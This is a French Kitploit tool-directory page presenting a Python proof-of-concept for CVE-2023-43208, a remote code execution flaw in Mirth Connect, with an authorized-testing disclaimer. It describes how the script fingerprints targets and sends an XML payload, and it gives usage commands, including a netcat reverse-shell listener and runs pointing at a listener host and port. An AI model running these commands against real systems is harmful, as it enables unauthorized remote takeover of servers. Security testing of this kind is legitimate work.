Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-43208 — PoC pour l'exploitation de la RCE CVE-2023-43208. | Kitploit
Outils/GitHubGitHub/predyy/cve-2023-43208
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubpredyy/cve-2023-43208

CVE-2023-43208

PoC pour l'exploitation de la RCE CVE-2023-43208.

Voir le dépôt
11il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-43208 Mirth Connect RCE PoC

Script Python de preuve de concept ciblant CVE-2023-43208 dans Mirth Connect.

Avertissement

À utiliser uniquement dans des environnements qui vous appartiennent ou pour lesquels vous êtes explicitement autorisé à effectuer des tests. Ce dépôt est destiné à la recherche en sécurité, à la validation et aux tests défensifs. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.

Présentation

exp.py est une version à dépendances minimales de PoC qui :

  • Détecte si une cible semble être une instance de Mirth Connect
  • Récupère la version de Mirth Connect depuis /api/server/version
  • Vérifie si la version est inférieure à 4.4.1
  • Envoie une charge utile XML à /api/users si la cible semble vulnérable

Le script utilise HTTPS par défaut et peut basculer sur HTTP avec --http.

Utilisation

root@kitploit:~
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]

Arguments

  • -u, --url : URL ou hôte Mirth Connect cible
  • -lh, --lhost : Hôte/IP local pour la connexion inverse
  • -lp, --lport : Port d'écoute local
  • --http : Force HTTP au lieu de HTTPS (HTTPS par défaut)

Exemple

Démarrez d'abord un listener :

root@kitploit:~
nc -lvnp 4444

Exécutez le script :

root@kitploit:~
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444

Pour une cible en HTTP uniquement :

root@kitploit:~
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http

Remarques

  • La vérification des certificats SSL est désactivée dans le script.
  • Le script demande une confirmation avant d'envoyer la charge utile.
  • La détection de version repose sur une comparaison sémantique avec 4.4.1.
  • Une cible détectée comme Mirth Connect n'est pas garantie d'être exploitable (les différences de réseau, d'environnement et d'exécution peuvent affecter les résultats).

Crédits

  • Découverte de la vulnérabilité d'origine : IHTeam
  • Code d'origine : K3ysTr0K3R et Chocapikk
  • Version à dépendances minimales : predyy
Télécharger l’outil